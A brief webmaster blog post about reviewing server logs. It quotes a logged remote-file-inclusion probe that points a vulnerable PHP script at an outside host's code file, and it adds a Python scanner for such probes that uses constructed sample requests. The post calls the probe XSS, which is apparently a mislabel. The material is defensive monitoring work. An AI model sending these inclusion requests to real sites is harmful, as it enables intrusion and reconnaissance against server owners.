Always watch your logs

You never know what treasures you might find

I always keep a pretty close eye on my logs. Especially when I have a relatively new site like Seocracy.com or Sharetactic.com.

I am usually keeping an eye on the logs to look out for errors or glitches or other unexpected behavior.


Sometimes, while scanning my logs, I see some pretty interesting stuff! Over the last two days, I've been watching several groups of people trying to direct some XSS attacks at my webserver. I'm sure I'm not alone!

Take this one for instance:

Http Code: 404 Date: Aug 15 10:14:09 Http Version: HTTP/1.1 Size in Bytes: 947

Referer: -
Agent: libwww-perl/5.803

../wamp_dir/setup/yesno.phtml?no_url=http://rpgnet.com/newrpgnet/c.txt?

 

When these kinds of gems show up in your logs, take some time to do some detective work & you will usually learn something.

 

By seeing this entry in my log, I know that someone is looking for a way to inject some code into my website by exploiting a pre-existing vulnerability (which my server doesn't have, hence the 404 error).

 

By going to the URL in the request: http://rpgnet.com/newrpgnet/c.txt we can see that this attacker is simply doing some reconnaissance on websites that might be vulnerable.

 

When this request is made on a vulnerable site, the code will run and will get the current UID it is running under and will email the intruder with the information so that he knows to add it to his list of websites that are open to attack in the future.

 

This isn't the most exciting example of this kind of thing, as the type of script he is trying to execute is really quite simple. But nevertheless, it goes to show you all that it pays to keep an eye on your logs and see what's happening behind the scenes.

--Rob
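
The manual check described in the post can be automated. The following is an added example, not code from the original post: it scans Apache combined-format log lines for query parameters whose value is an absolute URL, and marks any hit that did not return an error status for closer review. The sample lines, the `files.example` host and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (Apache combined format), not taken from a real log.
SAMPLE_LOG = '''\
203.0.113.7 - - [15/Aug/2024:10:14:09 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://files.example/c.txt? HTTP/1.1" 404 947 "-" "libwww-perl/5.803"
198.51.100.4 - - [15/Aug/2024:10:15:30 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Aug/2024:10:16:02 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example%2Fc.txt%3F HTTP/1.1" 200 5233 "-" "libwww-perl/5.803"
198.51.100.4 - - [15/Aug/2024:10:17:45 +0000] "GET /login?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself an absolute URL is the pattern to look for.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_inclusion_probes(log_text):
    """Return one finding per query parameter that carries an absolute URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                status = int(m["status"])
                findings.append({
                    "ip": m["ip"],
                    "path": parts.path,
                    "param": name,
                    "remote_url": value,
                    "status": status,
                    "agent": m["agent"],
                    # A 404 means the probed script is absent; a non-error
                    # status means the request reached real code.
                    "review": status < 400,
                })
    return findings

if __name__ == "__main__":
    for f in find_inclusion_probes(SAMPLE_LOG):
        flag = "REVIEW" if f["review"] else "probe"
        print(f'{flag:6} {f["status"]} {f["ip"]} {f["path"]} {f["param"]}={f["remote_url"]}')
```

Parameters that legitimately carry URLs (share or redirect links, for example) will also match, so a real deployment needs an allowlist of those path and parameter pairs.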


